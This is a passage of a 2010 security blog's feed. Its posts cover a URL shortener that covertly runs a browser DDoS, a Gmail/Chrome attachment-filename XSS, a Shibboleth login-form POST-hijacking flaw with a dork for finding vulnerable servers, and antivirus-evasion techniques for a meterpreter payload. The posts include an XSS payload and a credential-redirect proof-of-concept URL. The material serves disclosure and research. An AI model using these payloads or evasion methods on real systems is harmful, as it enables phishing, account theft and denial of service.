real fix.&lt;/p&gt;
&lt;p&gt;The main problem seems to be that browsers, when making HTML5
cross-origin requests, do not cache the fact that they have been denied
access on a certain server. Most servers have no reason to allow
cross-origin requests, and so rightly deny them across the board, but do
so (per official specifications) by replying without the domain name of
the requesting server in an Access-Control-Allow-Origin header. The
browsers, in turn, cache the denial for that particular piece of
content, but will willingly try to grab another piece of content
immediately. This is particularly obvious if you watch d0z.me work in
Chrome: the Javascript console fills up with denial after denial error,
but the browser continues to pound the server with requests.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/12/Screenshot-5.png"&gt;&lt;img alt="Chrome cross-origin error screenshot" src="https://spareclockcycles.org/wp-content/uploads/2010/12/Screenshot-5-300x167.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This seems silly at first glance, but is actually a side-effect of the
fact that different files/directories on the same site can have
different cross-origin policies (i.e., you can make specific files
cross-origin accessible by only adding the proper header when you
respond to those requests). The browser doesn't want to cache a denial
for the entire site when it's possible that some of the content could be
allowed. So here is our problem: how do we remember cross origin denials
for sites that have no such content, but still allow for sites to have
differing policies for different sections of their site?&lt;/p&gt;
&lt;p&gt;My first thought was to modify the standards to require any site that
services cross-origin requests in any capacity to put an
&amp;quot;Allows-Cross-Origin&amp;quot; header in all of their responses to cross-origin
response. This way, if a browser tries to access the server once with a
cross origin request and doesn't see this header, it can cache the
denied response for a certain period of time before allowing any other
requests to be sent, and be assured that there is no cross-origin
content available on the server. This will mitigate the attack for a
large portion of servers, as most have little reason to allow
cross-origin requests in the first place. For those that do need to
provide this service, it might be advisable for browsers to begin
rate-limiting cross-origin requests, so as to minimize the potential
effectiveness of this attack on those sites as well. There is no valid
reason that I can think of that a browser should need to make 10,000
cross-origin requests a minute, so why let it?&lt;/p&gt;
&lt;p&gt;This is by no means the only solution to this problem, however, and I
would love to hear what other ideas people have on the matter. I very
well could have overlooked a much more simple and effective fix, or
missed problems with my own.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="d0z-me-improvements-updates"&gt;
&lt;h2&gt;d0z.me Improvements/Updates&lt;/h2&gt;
&lt;p&gt;As I mentioned earlier, d0z.me was simply something I hacked together in
a few hours for research purposes (and, of course, fun). This,
unfortunately, led to code that is really not up to anyone's standards,
including mine, as I had been more concerned with testing the attack
than writing good stuff. I also did not experiment too much with the
best ways to exploit the HTML5 cross-origin approach, as I was planning
on doing this more later after I released the tool. I have been in
discussion with the researcher who originally reported on this problem,
&lt;a class="reference external" href="http://andlabs.org/about.html"&gt;Lavakumar Kuppan&lt;/a&gt;, who very kindly helped identify a number of places
where my code could be improved upon.&lt;/p&gt;
&lt;p&gt;Because of these things, I am working on releasing a more secure,
reliable, and effective PoC, written for Django and the Google App
Engine. The strain of keeping both spareclockcycles.org and d0z.me
running has not been easy on my server, so it will be nice to get half
the load into the cloud. This release will also hopefully include some
significant refinements to the stealth and speed of the DoS. It will
probably be delayed until after the holidays though, as I want to give
concerned parties some time to come up with fixes for this issue before
releasing a more potent tool, as well as give myself some time to make
sure I get things right.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="statistics-analysis"&gt;
&lt;h2&gt;Statistics Analysis&lt;/h2&gt;
&lt;p&gt;I know I promised &lt;a class="reference external" href="http://twitter.com/#!/sanitybit"&gt;&amp;#64;sanitybit&lt;/a&gt; that I would have some stats on d0z.me
today, but sadly, this post has already gotten way too long, and I'd
like to spend some quality time poking around with the numbers. However,
quick stats: at the time of this writing, I've had ~30,000 page views
(14,000 unique visitors) on the d0z.me domain and ~19,000 pageviews
(16,000 unique visitors) on spareclockcycles.org since Sunday.
Definitely not bad, especially for someone who is used to having visitor
counts in the tens...&lt;/p&gt;
&lt;p&gt;But yeah, welcome to all my readers! More interesting statistics are
still coming, so come back soon.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="d0z.me"></category><category term="ddos"></category><category term="html5"></category></entry><entry><title>d0z.me: The Evil URL Shortener</title><link href="https://spareclockcycles.org/2010/12/19/d0z-me-the-evil-url-shortener.html" rel="alternate"></link><updated>2010-12-19T18:08:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-12-19:2010/12/19/d0z-me-the-evil-url-shortener.html</id><summary type="html">&lt;div class="section" id="the-inspiration"&gt;
&lt;h2&gt;The Inspiration&lt;/h2&gt;
&lt;p&gt;I, like many people, have been closely following a lot of the chaos
happening around the recent Wikileaks dump, and was particularly
fascinated by &lt;a class="reference external" href="http://www.infosecurity-magazine.com/view/14448/wikileaks-let-the-ddos-battles-begin/"&gt;the DDoS attacks by activists on either side&lt;/a&gt;. One tool
specifically caught my eye in the midst of the attacks, however: the &lt;a class="reference external" href="http://encyclopediadramatica.com/LOIC#JS_LOIC"&gt;JS
LOIC&lt;/a&gt;. The tool works simply by constantly altering an image file's
source location, so that the browser is forced to continuously hammer
the targeted server with HTTP requests. Not a sophisticated or
technically interesting tool by any means, but conceptually interesting
in that it only requires a browser to execute one's portion of a DoS
attack. While the concept itself is not all that new, it got me thinking
about the implications of such browser based DoS attacks. Clearly, it
opens the door for the creation of a DDoS botnet without ever having to
actually exploit the hosts participating in the network; all that is
required is to get some Javascript to run in the participants' browsers.&lt;/p&gt;
&lt;p&gt;As if the JS LOIC concept didn't have serious enough implications on its
own, though, researchers from &lt;a class="reference external" href="http://blog.andlabs.org/"&gt;Attack &amp;amp; Defense Labs&lt;/a&gt; recently
presented a &lt;a class="reference external" href="http://blog.andlabs.org/2010/12/performing-ddos-attacks-with-html5.html"&gt;much more effective DoS attack vector&lt;/a&gt; at &lt;a class="reference external" href="https://www.blackhat.com/html/bh-ad-10/bh-ad-10-home.html"&gt;Blackhat Abu
Dhabi&lt;/a&gt;, which relies on &lt;a class="reference external" href="http://www.whatwg.org/specs/web-workers/current-work/"&gt;Web Workers&lt;/a&gt; and &lt;a class="reference external" href="http://www.w3.org/TR/cors/"&gt;Cross Origin Requests&lt;/a&gt; in
HTML5. This attack, though it only works in HTML5 browsers, is
supposedly capable of performing between 3,000 to 4,000 requests a
minute under real world conditions, which is a significant improvement
over the simple but functional img tag reload attack. In my tests, the
HTML5 attack clocked in at ~1500-2000 requests/minute, with the img
reload attack hovering around 600 requests/minute.&lt;/p&gt;
&lt;p&gt;In addition to these DoS worries, I have also been uncomfortable for
awhile now about the increasing use of and reliance upon URL shorteners
for sharing links. While we can somewhat trust larger names in the field
such as &lt;a class="reference external" href="http://bit.ly"&gt;bit.ly&lt;/a&gt;, it seems that the marketplace for these services is
becoming increasingly populated with more and more obscure shorteners.
This is quite worrying, as people it encourages people to trust all the
shortened links they happen to come across, even ones they've never seen
before, and acquire a false sense of security in the knowledge that it
will take them to the destination advertised by the text. However, as
most relatively savvy people should know, this is certainly not always
the case. A malicious shortener could essentially take you anywhere it
pleased, and the user would be none the wiser.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="d0z-me-please"&gt;
&lt;h2&gt;D0z Me Please&lt;/h2&gt;
&lt;p&gt;With these issues in mind, I began wondering: what would happen if I
mashed them all together? Enter &lt;a class="reference external" href="http://d0z.me"&gt;d0z.me&lt;/a&gt;: a proof-of-concept URL
shortener that, while getting users to their destinations, also covertly
attacks an arbitrary server.&lt;/p&gt;
&lt;p&gt;The concept is quite simple, really. Attackers go to &lt;a class="reference external" href="http://d0z.me"&gt;d0z.me&lt;/a&gt; and enter
a link they think could be popular/want to share, but also enter the
address of a server that they would like to attack as well. Then, they
share this text with as many people as possible, in as many places as
possible. Extensive use of social media sites is probably a must achieve
the best results.&lt;/p&gt;
&lt;p&gt;When users click on the link, they appear to be redirected to the
requested content, but they are in fact looking at the page in an
embedded iframe. This is identical to how those rather annoying Digg and
Stumbleupon toolbars work, except the embedding is invisible to the user
(minus the location URL in the toolbar). While the users are busy
viewing the page, a malicious Javascript DoS runs in the background,
hammering the targeted server with an deluge of requests from these
unsuspecting clients. If these clients continue browsing from that page,
we can maintain our DoS in the background the entire time.&lt;/p&gt;
&lt;p&gt;Clearly, this attack is dependent on getting a significant number of
users to view a given link in a short amount of time, and, hopefully,
keeping them on the page as long as possible. There are two main
scenarios for garnering such traffic: one, tricking users into viewing
the link and staying on it through whatever means necessary, and two, a
concerted effort by a large number of users who willingly join the DDoS
by following the link.&lt;/p&gt;
&lt;p&gt;Scenario number one requires that the malicious attacker first come up
with some content that he/she thinks will/could become popular; finding
said content, of course, is not always an easy task. One possible vector
is through the use of online games. Such games tend to keep users on the
site for extended periods of time, lengthening the time of DoS. If one
could find/make a game popular enough, and spread it through this link,
then a significant amount of traffic could be achieved. Another
possibility is a variation on what we have come to know as the free iPad
scam. Tell users that if they open a link and stay on the page long
enough, they will win a free iPad. This could be surprisingly effective,
given how successful such offers have been in the past. A third possible
way to exploit this technique could be a malicious rick roll of sorts:
promise one thing, deliver another ridiculous/hilarious other thing, and
hope that people find it funny and spread it quickly to as many people
as possible.&lt;/p&gt;
&lt;p&gt;Scenario two seems more similar to what we are currently seeing behind
the Wikileaks-related attacks. If leaders convince enough of their
followers simply to &amp;quot;open this link to win&amp;quot;, it is conceivable that a
very large number of people would chose to do so. However, this
particular method (URL shortened link) is much more troublesome than
current methods as, in such a scenario, there would be little way for
authorities to determine whether or not a participant was intentionally
or inadvertently involved in the attack. It is possible that some
participants may have simply been curious or tricked into clicking the
link, providing plausible deniability for any would-be attacker.&lt;/p&gt;
&lt;p&gt;Both of these attacks, of course, can be mixed together in a hybrid
style attack, which is the most likely form that it would take in a real
DDoS. It is not completely clear to me what results a possible attack
could achieve, but it seems likely that, given a dedicated userbase, one
could use this method with a decent level of effectiveness. In addition,
it would give intentional attackers a shield of plausible deniability to
hide behind in case their IP address was singled out as an attacker in
the DoS.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="implementation-details"&gt;
&lt;h2&gt;Implementation Details&lt;/h2&gt;
&lt;p&gt;My implementation of this attack is, at best, a hack job, but was merely
meant to illustrate how easy it is to actually implement, how simple it
is to launch a DDoS simply by getting people to follow a link, and how
seriously our reliance on URL shorteners can affect security. This
implementation utilizes two DoS methods: first, of course, is the same
method as the JS LOIC (refreshing images repeatedly), and second is the
HTML5 vector that was previously discussed. The linked page is embedded
via a simple iframe.&lt;/p&gt;
&lt;p&gt;As it is, the HTML5 attack and the img reload attack are both basically
invisible in Chrome unless you're looking for them. I had to open
Wireshark, the Javascript console, or my server logs to verify that the
DoS was actually functioning correctly. Firefox is pretty noisy about
the tests, though, as the img reload attack causes the page to appear to
be loading indefinitely, and the HTML5 web worker threads chew up
processor time.&lt;/p&gt;
&lt;p&gt;I haven't spent much time trying to solve these, but if someone knows a
fix, I'd appreciate your help. I have also done a little messing around
with different ways of keeping the user on the page, but atm have not
had much success without resorting to extremely annoying and only
minimally effective techniques. I am &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/dosme.tar.gz"&gt;releasing the code&lt;/a&gt; under the
GPLv3, and, as always, welcome any advice that people have. As it's been
a couple years since I've done much web application work, please be
gentle.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="mitigation"&gt;
&lt;h2&gt;Mitigation&lt;/h2&gt;
&lt;p&gt;Mitigating these types of attacks is not exactly straightforward. As
with all DoS attacks, there's only so much one can do to prevent them.
If an attacker simply has more bandwidth than you have, as they would if
they got enough people to click these links, then it's pretty much game
over regardless until you can get the attacks blocked at the ISP level.
As these attacks do not rely on spoofed packets, and appear, at least at
a passing glance, to be legitimate traffic, filtering it is also
somewhat difficult.&lt;/p&gt;
&lt;p&gt;The HTML5 CORS attack, according to A&amp;amp;RL's research, can be blocked if
your server doesn't allow cross origin requests by making a rule in your
WAF that blocks all requests with Origin in the headers. However, given
enough people doing this attack, it could become overwhelmed regardless.&lt;/p&gt;
&lt;p&gt;You can find &lt;a class="reference external" href="http://www.google.com/search?q=mitigating+dos+attacks"&gt;more about mitigating DoS attacks on Google&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;From an end-user's perspective, all you need to do to avoid joining a
DDoS is to be careful about following suspicious URL redirector links,
and use something like &lt;a class="reference external" href="http://noscript.net/"&gt;NoScript&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="final-notes"&gt;
&lt;h2&gt;Final Notes&lt;/h2&gt;
&lt;p&gt;A few final notes:&lt;/p&gt;
&lt;p&gt;Firstly, this site is NOT meant to be an attack site, or to help support
either side in the whole Wikileaks debacle. I don't want any part in the
current cyber skirmishes. It is merely a demonstration of some things
that I found interesting and wanted to work on.&lt;/p&gt;
&lt;p&gt;Secondly, I am not responsible for how this site or this code is used.
You should only be testing this on sites you own and control, and if you
aren't, chances are that you are breaking the law. You, the user, are
responsible for knowing the relevant laws in your area, and acting
accordingly.&lt;/p&gt;
&lt;p&gt;Thirdly, to the researchers who first reported on the HTML5 DDoS vector,
thanks. Quite interesting research. I owe you a beverage of your
choosing sometime :P .&lt;/p&gt;
&lt;p&gt;Finally, yes, to all you a-holes out there, I know, it would be
ironic/funny to dos a site that is demonstrating a dos attack. Please
don't. I know you can, and that it would be trivial to do, as this
server isn't exactly hardened. Let's just save each other the time and
hassle and say that you win, theoretical attacker. Congratulations.&lt;/p&gt;
&lt;/div&gt;
</summary></entry><entry><title>Gmail+Google Chrome XSS Vulnerability</title><link href="https://spareclockcycles.org/2010/12/14/gmail-google-chrome-xss-vulnerability.html" rel="alternate"></link><updated>2010-12-14T20:24:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-12-14:2010/12/14/gmail-google-chrome-xss-vulnerability.html</id><summary type="html">&lt;p&gt;The weekend before last, I found a flaw in Gmail that on the one hand
was rather exciting for me (as I hadn't expected to find anything at
all, and it was pretty clearly &lt;a class="reference external" href="http://googleonlinesecurity.blogspot.com/2010/11/rewarding-web-application-security.html"&gt;reward-worthy&lt;/a&gt;), but on the other was a
little unnerving, given how quickly and easily I was able to find it and
how serious the vulnerability was.&lt;/p&gt;
&lt;div class="section" id="vulnerability-discovery"&gt;
&lt;h2&gt;Vulnerability Discovery&lt;/h2&gt;
&lt;p&gt;While doing some work on an exploit for an XSS flaw that I had already
found on another platform (details will be released in the semi-near
future), I decided to see if there were any XSS vulnerabilities that I
had missed. The first thing I wanted to try was to see if the
application was properly sanitizing filenames in attachments, so I
modified a Python email testing application I hacked together and shot
off an email with an attachment named '';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}.txt (a la
&lt;a class="reference external" href="http://ha.ckers.org/xss.html"&gt;RSnake&lt;/a&gt;) .&lt;/p&gt;
&lt;p&gt;Everything looked good on the platform I was testing, so I began
considering other possible attack vectors. However, on a whim, I decided
to open up the email in Gmail as well, so I fired up Chrome and logged
into my test account. I could not believe my eyes, but the filename was
being used un-sanitized! A couple test emails later, I had a working XSS
attack on the standard Gmail interface.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="proof-of-concept"&gt;
&lt;h2&gt;Proof of Concept&lt;/h2&gt;
&lt;p&gt;Send an email from the SMTP server of your choice with an attachment
named:&lt;/p&gt;
&lt;p&gt;&amp;quot;&amp;gt;&amp;lt;img src=&amp;quot;&lt;a class="reference external" href="http://bit.ly/XcfTv"&gt;http://bit.ly/XcfTv&lt;/a&gt;&amp;quot;
onload=&amp;quot;alert(String.fromCharCode(88,83,83))&amp;quot;/&amp;gt;.txt&lt;/p&gt;
&lt;p&gt;Screenshot:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/12/Screenshot-2.png"&gt;&lt;img alt="Gmail XSS 1" src="https://spareclockcycles.org/wp-content/uploads/2010/12/Screenshot-2-300x174.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Now, at this point, I was a little incredulous. There's no way that
after about 10 minutes of work I had just found an XSS flaw this basic
in what, I believe, is the most used webmail interface in the world,
right? Well, as it turns out, it was not *quite* as bad as I had
originally thought. I opened Firefox to test the flaw, and was surprised
to find the filename was now perfectly sanitized. Upon testing in a
number of other browsers and OSs, it appeared that the flaw solely
affected Chrome on all platforms.&lt;/p&gt;
&lt;p&gt;Given that I'm in the middle of exams right now, I sadly didn't have
time to try to reverse the exact point of failure before the fix was
applied, but my shot-in-the-dark guess would be that Google rolled out a
new feature for testing in Chrome first before it moved to other
browsers, and somewhere in their changes a sanitation routine got
bypassed. However, this is sadly just a random guess, and Google did not
enlighten me as to the specific details. Sorry to disappoint, all.&lt;/p&gt;
&lt;p&gt;EDIT: I hate to leave questions unanswered; after all, I'm curious too.
Although I could be wrong, the flaw seems to stem from Google's addition
of a new &amp;quot;drag-files-to-the-desktop&amp;quot; feature a few months back. This
would explain why a.) only Chrome was vulnerable and b.) it was the
icons/links offering drag-and-drop that were affected, via unsanitized
alt attribute. If anyone else knows better, though, I'd love to speak
with you.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="disclosure"&gt;
&lt;h2&gt;Disclosure&lt;/h2&gt;
&lt;p&gt;Regardless, given that &lt;a class="reference external" href="http://www.w3schools.com/browsers/browsers_stats.asp"&gt;an estimated 20% of Internet users use Google
Chrome&lt;/a&gt; and at least half of them use the webmail interface (I think
more, probably, but I'll be conservative), at least 10% of the Gmail
userbase was vulnerable to all the nasty things one can do via XSS,
simply by viewing an email with a maliciously crafted attachment.
Although my exploit simply added some lovely pictures of Rick Astley to
the email and popped up an alert dialog, it could have done such things
as stolen cookies (giving an attacker a chance to hijack the account
remotely), sent emails (think XSS worm), and read out emails and
contacts from the account, all largely hidden from the user. I promptly
notified Google of the problem, given the serious nature of the issue.&lt;/p&gt;
&lt;p&gt;I have to commend the Google Security Team for their blazingly fast
response to my disclosure. Although the screenshot demoing XSS in Gmail
probably encouraged a faster reaction, they replied within 15 minutes of
my initial email notifying me that they had read the disclosure and were
looking into the problem. Given that I notified them at 5P.M on a
Saturday afternoon, I was duly impressed. Within 24 hours, the flaw had
been patched, and soon after I received an email notifying me that a
temporary fix had been put into place. I had not even expected much of a
response until Monday, let alone a fix, so I was quite happy with their
reaction. Friendly, quick, and professional: the Google Security Team
should serve as a model for other organizations who are working on
handling disclosures by independent researchers effectively.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="random-other-blather"&gt;
&lt;h2&gt;Random Other Blather&lt;/h2&gt;
&lt;p&gt;I still have to wonder, though, how this flaw got through Google's
testing in the first place. As I stated earlier, it was a little
unnerving to me that I found an attack vector that quickly and easily,
given that I didn't do anything to find it that anyone should find
particularly clever. Clearly, my discovery was aided significantly by
blind luck, but my research this past week has certainly has made me
think twice about ever using web-based interfaces to view my email.&lt;/p&gt;
&lt;p&gt;I am glad to see though that Google is being very active and responsive
in closing security holes, though, and (great for me!) &lt;a class="reference external" href="http://www.google.com/corporate/halloffame.html"&gt;rewarding those
who report such flaws&lt;/a&gt; appropriately. I am hopeful that as long as
organizations begin to follow Google's lead and encourage independent
security research on their products, we might someday reach a point
where finding vulnerabilities of similar gravity is a matter of years of
research and development, rather than a few minutes of time and ~10
lines of Python.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="chrome"></category><category term="gmail"></category><category term="google chrome"></category><category term="google reward program"></category><category term="vulnerability"></category><category term="xss"></category></entry><entry><title>Shibboleth Example Login Page: POST Location Hijacking Vulnerability</title><link href="https://spareclockcycles.org/2010/12/09/shibboleth-post-location-hijacking-vulnerability.html" rel="alternate"></link><updated>2010-12-09T21:30:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-12-09:2010/12/09/shibboleth-post-location-hijacking-vulnerability.html</id><summary type="html">&lt;p&gt;EDIT: This flaw, according to the lead Shibboleth developer, was
&lt;a class="reference external" href="http://shibboleth.internet2.edu/secadv/secadv_20081103.txt"&gt;discovered and patched in late 2008&lt;/a&gt;. It seems that a number of
universities are still running outdated copies of the software, which is
what I found in my research. If you are running the latest version of
Shibboleth (2.2.0), you should be perfectly fine.&lt;/p&gt;
&lt;p&gt;Normally I'd be rather happy with myself for finding an XSS flaw in a
number of different login systems. However, sometimes it is just icing
on the cake. The interesting flaw here is a vulnerability that allows an
attacker to control the POST location of login forms in poor
implementations of a widely used login system called &lt;a class="reference external" href="http://shibboleth.internet2.edu/"&gt;Shibboleth&lt;/a&gt;,
thanks to a weakly protected example login page.&lt;/p&gt;
&lt;p&gt;Now first, to be clear, this certainly was not entirely the fault of the
Shibboleth developers. In fact, they probably knew the example wasn't
secure, and assumed that anyone implementing their own login system
would surely lock down the page. In addition, most of the
implementations are, in fact, secured. That said, the small minority
that failed to add proper sanitation of user input left their login
systems wide open to phishing attacks.&lt;/p&gt;
&lt;p&gt;So onto the vulnerability. Awhile back, my school switched over to
Google Apps for their email, and used Shibboleth (as many schools do)
for authentication. This wouldn't be a problem, but someone apparently
didn't pay enough attention to possible security holes in the demo
application, as they should have. And, as it turns out, some other
universities made the same mistake.&lt;/p&gt;
&lt;p&gt;I found the issue when I got curious one day about how the
authentication system worked. I started doing some poking around with
&lt;a class="reference external" href="https://addons.mozilla.org/en-US/firefox/addon/966/"&gt;TamperData&lt;/a&gt; to see where my browser was being redirected to during the
process. My attention was drawn to a parameter set on the school's login
page named &amp;quot;actionUrl&amp;quot;. It's default value, set during a redirect, was
&amp;quot;/idp/Authn/UserPassword&amp;quot;. Curious, I of course changed the parameter to
a remote url, &amp;quot;&lt;a class="reference external" href="http://google.com"&gt;http://google.com&lt;/a&gt;&amp;quot;. I refreshed, clicked submit, and sure
enough, the form attempted to submit the form via POST request to
Google.&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;PoC:&lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;https://myvulnlogin.university.edu/idp/login.jsp?actionUrl=http://google.com&lt;/span&gt;&lt;/tt&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Clearly, not good. To make matters worse, it would also accept a POST
variable if the GET variable wasn't set, meaning I could create a
malicious link that linked directly to the official login page, POSTs to
a webserver that I control, AND is entirely transparent to the user
(same website, valid SSL cert, no strange GET parameters). I'm not
entirely sure they could have made phishing any easier for an attacker.
However, exploiting this through POST requests can be quite difficult
through email based methods, so doing things this way requires a rather
different approach that I might make a post on later.&lt;/p&gt;
&lt;p&gt;For the time being, the GET PoC is more than sufficient to demonstrate
how bad the problem is. If you want to prove that it actually works, I
recommend using GNU Citizen's simple &lt;a class="reference external" href="http://lab.gnucitizen.org/projects/x-php-data-theft-script"&gt;x.php&lt;/a&gt; script, or (like I did)
rolling your own in Python. Finding vulnerable servers is a bit
annoying, as many of them have indexing disabled in their robots.txt,
and some vulnerable servers don't explicitly have the &amp;quot;actionUrl&amp;quot;
parameter in their URL, but searching &lt;a class="reference external" href="http://www.google.com/search?hl=en&amp;amp;noj=1&amp;amp;q=inurl:%22idp/login.jsp%22"&gt;inurl:&amp;quot;idp/login.jsp&amp;quot;&lt;/a&gt; still
brings up a few vulnerable pages. Chances are though if you are at or
have recently attended a university, you have probably used
Shibboleth-based authentication at some point, and that the login page
is possibly vulnerable.&lt;/p&gt;
&lt;p&gt;As stated before, these pages are also vulnerable to reflected XSS
attacks in the same parameter, but truthfully there's not too much
reason to use it when you can so easily capture a target's username and
password in an almost completely transparent manner, unless you'd just
rather hijack their session for some reason. Hopefully those who set up
these pages will fix these flaws before phishers and the like start
taking advantage of their quite serious shortcomings. As it stands, my
university still hasn't (over two and a half weeks after I notified
them), so I'm hoping this release will encourage them to fix their site,
as well as make people aware that there is a problem. More likely,
however, it will just encourage them to yell at me. So it goes.&lt;/p&gt;
</summary><category term="implementation fail"></category><category term="phishing"></category><category term="post hijacking"></category><category term="shibboleth"></category><category term="xss"></category></entry><entry><title>Avoiding AV Detection</title><link href="https://spareclockcycles.org/2010/11/27/avoiding-av-detection.html" rel="alternate"></link><updated>2010-11-27T05:07:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-11-27:2010/11/27/avoiding-av-detection.html</id><summary type="html">&lt;p&gt;As a follow-up to my post on the &lt;a class="reference external" href="https://spareclockcycles.org/2010/11/21/the-usb-stick-o-death/"&gt;USB Stick O' Death&lt;/a&gt;, I wanted to go a
little more in depth on the subject of AV evasion. Following my release
of (some of) my code for obfuscating my payload, it became apparent that
researchers at various antivirus companies read my blog (Oh hai derr
researchers! Great to have you with us! I can haz job?) and updated
their virus definitions to detect my malicious payload. To be perfectly
honest, I was hoping this would happen, as I figured it would be a
teachable moment on just how ineffective current approaches to virus
detection can be, give readers a real world look at how AV responds to
new threats, and provide one of the possible approaches an attacker
would take to evading AV software. My main goal in this research was to
see how much effort it would take to become undetectable again, and the
answer was 'virtually none'.&lt;/p&gt;
&lt;p&gt;In this post, I will first look at how I was able to evade detection by
many AV products simply by using a different compiler and by stripping
debugging symbols. Then, I will look at how I was able to defeat
Microsoft's (and many other AV products') detection mechanisms simply by
&amp;nbsp;&amp;quot;waiting out&amp;quot; the timeout period of their simulations of my program's
execution. However, a quick note before we begin: I'm by no means an
expert on antivirus, as this exercise was partly to further my
understanding of how AV works, and these explanations and techniques are
based on my admittedly poor understandings of the technologies behind
them. If I mistakenly claim something that isn't true, or you can shed
light on some areas that I neglect, please comment. I would love to
learn from you.&lt;/p&gt;
&lt;div class="section" id="compiler-confusion"&gt;
&lt;h2&gt;Compiler Confusion&lt;/h2&gt;
&lt;p&gt;In my original post, I mentioned that I ended up using a copy of mingw64
from &lt;a class="reference external" href="https://launchpad.net/~tobydox/+archive/mingw"&gt;this PPA&lt;/a&gt; rather than from the standard Ubuntu repositories.
While you'd think that this detail wouldn't matter significantly, it
really ends up being almost everything. My malicious payload, when
compiled with that version of mingw64 rather than the default one, has
an enormously lower detection rate . Why is this?&lt;/p&gt;
&lt;p&gt;Well, apparently the two versions have enough differences in their
backend algorithms that the executable generated with Ubuntu's trips
some heuristic definitions, while one made with the PPA version doesn't.
The reason that Ubuntu's is being detected over the PPA is obvious:
attackers are more likely to have used the default one in the repos. In
addition, I actually saw three or four AV companies add detection for
the Ubuntu version of the executable, but have only seen one possible
additional detection of the PPA version (although it might have been a
fluke, but I used it as my example anyway), which seems to indicate that
the researchers trying to replicate my executables were using the
default mingw64 as well. This confuses me a bit, as I've been uploading
my attempts to VirusTotal and linking to them, but hopefully they will
analyze them at some point.&lt;/p&gt;
&lt;p&gt;I haven't spent the time yet to figure out what is specifically causing
the problem for AV between the two versions of mingw64, and I imagine it
varies by AV product, but it serves to illustrate quite clearly the
large challenge facing AV companies of simply dealing with different
compilers and different optimization routines (&lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=50055a232f9ae68b6fadea719a9bc63efb752c49f78142610d5f5b2cb703ef7b-1290824043"&gt;payload detection rate
with Ubuntu's mingw64&lt;/a&gt; / &lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=2def01df66c757c7f3167cd1b2b55c34a4e2f090dc1296e3f171c697f59a4cca-1290740250"&gt;payload detection rate with PPA mingw64&lt;/a&gt;)&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="debugging-symbols-debacle"&gt;
&lt;h2&gt;Debugging Symbols Debacle&lt;/h2&gt;
&lt;p&gt;While the different compiler issue might be eye opening to some, I had
suspected that it would be an easy way to prevent detection, at least
early on in the lifecycle of a piece of malware. I was not expecting,
however, for debugging symbols to factor at all into the detection
issue. They have no impact on the actual behavior of the code itself,
only on code size and apparent file similarity by some metrics. However,
in my tests, simply stripping out the debugging symbols (strip
--strip-debug filename) managed to erase the detections I was getting
from two AV products, Ikarus and Emnisoft (&lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=b3cacc1ab49cf339d23dac78d6e940b78bff37779c5935e44e8472d86b752f11-1290826266"&gt;detection results&lt;/a&gt;). My
guess is that their scanning algorithms look for files that are a
certain percentage similar to previously seen malicious executables, and
then subject those to a sandboxed execution to try and gain a clean
memory image. Because the executables are (by their metrics) not very
similar, this sandboxed execution was not triggered, and the malicious
code that is revealed in memory during execution is not discovered.
However, this is certainly just a guess, and I would love for someone
more well versed in the finer points of AV operation to explain it to
me.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="timing-troubles"&gt;
&lt;h2&gt;Timing Troubles&lt;/h2&gt;
&lt;p&gt;Even with these two methods, however, I was still not completely
escaping AV detection. The closest I had come was by using the PPA
mingw64 version and stripping debugging symbols, which got me to my
original detection rate in which Microsoft was the only program
detecting my executable. It was clear at this point that Microsoft was
detecting my code by running it in a sandbox or simulator of some kind,
where it then was able to obtain a memory dump that revealed the
presence of my meterpreter payload. Being the perfectionist that I am
when it comes to these things, I still wanted 0% detection rather than
1/43. So how to do this?&lt;/p&gt;
&lt;p&gt;Given that my understanding of the problem was correct, there were two
possible ways: avoid triggering the heuristic definition that marked it
for further scrutiny, or somehow defeat the sandbox itself.
Surprisingly, I ended up going with the latter. After a good number of
failed attempts to modify the code in such a way that it avoided the
heuristic trigger, I came up with a different idea: outlasting the
sandbox timeout. Because it made no sense to suppose that the sandbox
would allow the application to run indefinitely, I supposed that
Microsoft had some set limit of instructions or time that it would
simulate program execution for before killing it and taking a memory
dump. As it turns out, this assumption proved correct, and that timeout
period wasn't very long at all. To test my theory, I created two
slightly modified versions of my original, in which I just inserted two
loops into my decryption loop. I could have used anything that simply
chewed up CPU cycles, so this implementation choice is arbitrary and
intentionally ridiculous. The configurations (which can be inserted into
&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/usod_v0.01.tar.gz"&gt;my original hide_payload.py script&lt;/a&gt;) are below.&lt;/p&gt;
&lt;div class="line-block"&gt;
